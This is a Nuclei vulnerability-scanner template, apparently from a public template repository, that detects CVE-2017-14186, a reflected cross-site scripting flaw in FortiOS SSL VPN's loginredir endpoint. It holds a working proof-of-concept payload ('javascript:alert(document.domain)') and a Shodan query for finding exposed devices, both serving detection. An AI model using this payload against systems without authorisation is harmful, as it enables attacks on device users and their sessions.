nuclei-templates/http/cves/2017/CVE-2017-14186.yaml

51 lines
1.7 KiB
YAML

id: CVE-2017-14186
info:
name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting
author: johnk3r
severity: medium
description: |
FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.
reference:
- https://www.fortiguard.com/psirt/FG-IR-17-242
- https://fortiguard.com/advisory/FG-IR-17-242
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
- http://www.securitytracker.com/id/1039891
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-14186
cwe-id: CWE-79
epss-score: 0.02948
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
epss-percentile: 0.89542
metadata:
max-request: 1
shodan-query: port:10443 http.favicon.hash:945408572
verified: true
vendor: fortinet
product: fortios
tags: cve,cve2017,fortigate,xss,fortinet
http:
- method: GET
path:
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200